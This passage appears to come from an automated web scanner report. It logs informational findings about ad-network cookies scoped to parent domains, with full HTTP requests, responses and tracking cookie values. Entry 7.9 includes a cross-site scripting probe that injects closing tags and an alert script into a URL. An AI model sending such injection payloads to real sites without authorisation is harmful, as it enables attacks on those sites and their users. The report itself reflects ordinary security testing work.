Set-Cookie: _wr="g23001";expires=Sat, 19 Feb 2011 00:13:55 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/xml
Pragma: no-cache
Vary: Accept-Encoding
Date: Thu, 20 Jan 2011 00:13:55 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Content-Length: 26163

<adResponse version='1'><rendererManifest version='1'>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;adRenderers version=&apos;1&apos;&gt;&lt;adRenderer adUnit=&apos;video,fixed-
...[SNIP]...

7.5. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad?asId=1000000238307&sd=2x728x90&ct=15&enc=1&nif=1&sf=0&sfd=0&ynw=0&anw=1&rand=89023115&rk1=28177253&rk2=1295482425.162&pt=0&asc=139x31&vad=950x996 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.sailinganarchy.com/index_page1.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; c=AQEBAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/javascript
Content-Length: 1087
Set-Cookie: f=AgEBAAAAAAAMqJEHA343TQ==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
Set-Cookie: c=AQECAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00BAAEAdaTl1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

document.write("<script language=\"JavaScript\" src=\"http://a.collective-media.net/adj/cm.martini/;sz=728x90;click0=http%3a%2f%2fad.afy11.net%2fad%3fc%3dEPLFVb4gYEitVIXNBCKa0xQ7E-q0hdHagyKSV9rbMGn0fJ
...[SNIP]...

7.6. http://ad.doubleclick.net/click

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click;h=v8/3a95/3/0/*/s;234980170;1-0;0;57570438;2321-160/600;40268054/40285841/1;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;~okv=;pc=DFP234824030;;~aopt=0/ff/ef/ff;~fdr=234824030;0-0;62;49633220;2321-160/600;40285688/40303475/1;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;~okv=;net=cm;u=,cm-93054228_1295482822,11d765b6a10b1b3,sports,cm.cm_aa_gn1-cm.sportsreg-cm.sports_l-cm.weath_l;;cmw=owl;sz=160x600;net=cm;ord1=405617;contx=sports;an=40;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sports_l;btg=cm.weath_l;~aopt=2/0/ef/0;~sscs=?http:/www.lexus.com/thehardway/?vidid=thw3&cid=THW11NBROBOT HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.lexus.com/thehardway/?vidid=thw3&cid=THW11NBROBOT
Set-Cookie: id=c653243310000d9|1044889/556043/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 20 Jan 2011 00:35:29 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


7.7. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;234517278;58326487;v;pc=[TPAS_ID] HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.sho.com/site/order/index.do?source=acq_m_jan?source=m_JAQ_1047249_58326487_0&utm_source=58326487&utm_medium=omddisplay&utm_content=0&utm_campaign=JAQ
Set-Cookie: id=c653243310000d9|2201481/1047249/14994|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 20 Jan 2011 00:35:32 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


7.8. http://brxserv.btrll.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:28:43 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:28:43 GMT; path=/; domain=.btrll.com
Content-Length: 161
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
Found unexpected '.' character in position 1 of path: /favicon.ico</body>
</html>

7.9. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AD)%3C/script%3E HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.0 404 Not Found
Date: Thu, 20 Jan 2011 00:30:52 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:30:52 GMT; path=/; domain=.btrll.com
Content-Length: 243
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
Missing parameter in position 7 of path: /v1/epix/2903/3844555/1938/2286/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea
...[SNIP]...

7.10. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]]

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.click/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2Nsay8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL25vbmUvO1ZpZGVvOzEyOTU0ODI0NDI]] HTTP/1.1
Host: brxserv.btrll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:40:06 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:06 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/clk/2901/4258/PreRoll.911.109723/none/;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.11. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:14:37 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:37 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/done;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.12. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]]

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.end/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL2RvbmU7VmlkZW87MTI5NTQ4MjQ0Mg]] HTTP/1.1
Host: brxserv.btrll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:40:05 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:05 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: http://2901.btrll.com/imp/2901/4258/PreRoll.911.109723/done;Video;1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.13. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
Referer: http://a.blip.tv/scripts/flash/stratos.swf?file=http%3A//blip.tv/rss/flash/4658178%3Freferrer%3Dblip.tv%26source%3D1%26use_direct%3D1%26use_documents%3D1&enablejs=true&showplayerpath=http%3A//a.blip.tv/scripts/flash/stratos.swf&autostart=true&feedurl=http%3A//armchairmango.blip.tv/rss&playerUrl=http%3A//a.blip.tv/scripts/flash/stratos.swf&staggeredLoad=true&showinfo=false&enableHtml5Player=true
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DRN1=AGPX0VDzIfo; BR_MBBV=Ak0tGDgAo4f8AWJjWTw

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:14:07 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:14:07 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: GHP=AAAHkk03fk8FoA; expires=Mon, 21-Mar-2011 00:14:07 GMT; path=/; domain=.btrll.com
Location: http://b.scorecardresearch.com/p?c1=1&c2=6000006&c3=&c4=&c5=010000&c6=2903&c10=&cA1=8&cA2=6000006&cA3=3844555&cA4=1938&cA5=393&cA6=2903&cA10=2286&cv=1.7&cj=&rn=1295482442&r=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-cb6C0zFF7dWjI.gif%3Flabels%3Dp.2903.3844555.0%2Ca.393.1938.2286%2Cu.pre.0x0%3Bmedia%3Dad%3Br%3D1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.14. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]]

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.imp/r_64.aHR0cDovL2Iuc2NvcmVjYXJkcmVzZWFyY2guY29tL3A_YzE9MSZjMj02MDAwMDA2JmMzPSZjND0mYzU9MDEwMDAwJmM2PTI5MDMmYzEwPSZjQTE9OCZjQTI9NjAwMDAwNiZjQTM9Mzg0NDU1NSZjQTQ9MTkzOCZjQTU9MzkzJmNBNj0yOTAzJmNBMTA9MjI4NiZjdj0xLjcmY2o9JnJuPTEyOTU0ODI0NDImcj1odHRwJTNBJTJGJTJGcGl4ZWwucXVhbnRzZXJ2ZS5jb20lMkZwaXhlbCUyRnAtY2I2QzB6RkY3ZFdqSS5naWYlM0ZsYWJlbHMlM0RwLjI5MDMuMzg0NDU1NS4wJTJDYS4zOTMuMTkzOC4yMjg2JTJDdS5wcmUuMHgwJTNCbWVkaWElM0RhZCUzQnIlM0QxMjk1NDgyNDQy]] HTTP/1.1
Host: brxserv.btrll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GHP=AAAHkk03fk8FoA; BR_MBBV=Ak0tGDgAo4f8AWJjWTw; DRN1=AGPX0VDzIfo;

Response

HTTP/1.1 302 Found
Date: Thu, 20 Jan 2011 00:40:04 GMT
Server: Apache/2.0.63 (Unix)
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak0tGDgAo4f8AWJjWTw; expires=Thu, 19-Jan-2012 00:40:04 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: GHP=AAAHkk03fk8FoAAZ; expires=Mon, 21-Mar-2011 00:40:04 GMT; path=/; domain=.btrll.com
Location: http://b.scorecardresearch.com/p?c1=1&c2=6000006&c3=&c4=&c5=010000&c6=2903&c10=&cA1=8&cA2=6000006&cA3=3844555&cA4=1938&cA5=393&cA6=2903&cA10=2286&cv=1.7&cj=&rn=1295482442&r=http%3A%2F%2Fpixel.quantserve.com%2Fpixel%2Fp-cb6C0zFF7dWjI.gif%3Flabels%3Dp.2903.3844555.0%2Ca.393.1938.2286%2Cu.pre.0x0%3Bmedia%3Dad%3Br%3D1295482442
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7.15. http://brxserv.btrll.com/v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://brxserv.btrll.com
Path:   /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v1/epix/2903/3844555/1938/2286/MbrcHW8wOlCcRNN35KAAAHkgAACO4AOqnLAAAAAAIoYe52LkGtZg/event.mid/r_64.aHR0cDovLzI5MDEuYnRybGwuY29tL2ltcC8yOTAxLzQyNTgvUHJlUm9sbC45MTEuMTA5NzIzL21pZDtWaWRlbzsxMjk1NDgyNDQy HTTP/1.1
Host: brxserv.btrll.com
Proxy-Connection: keep-alive
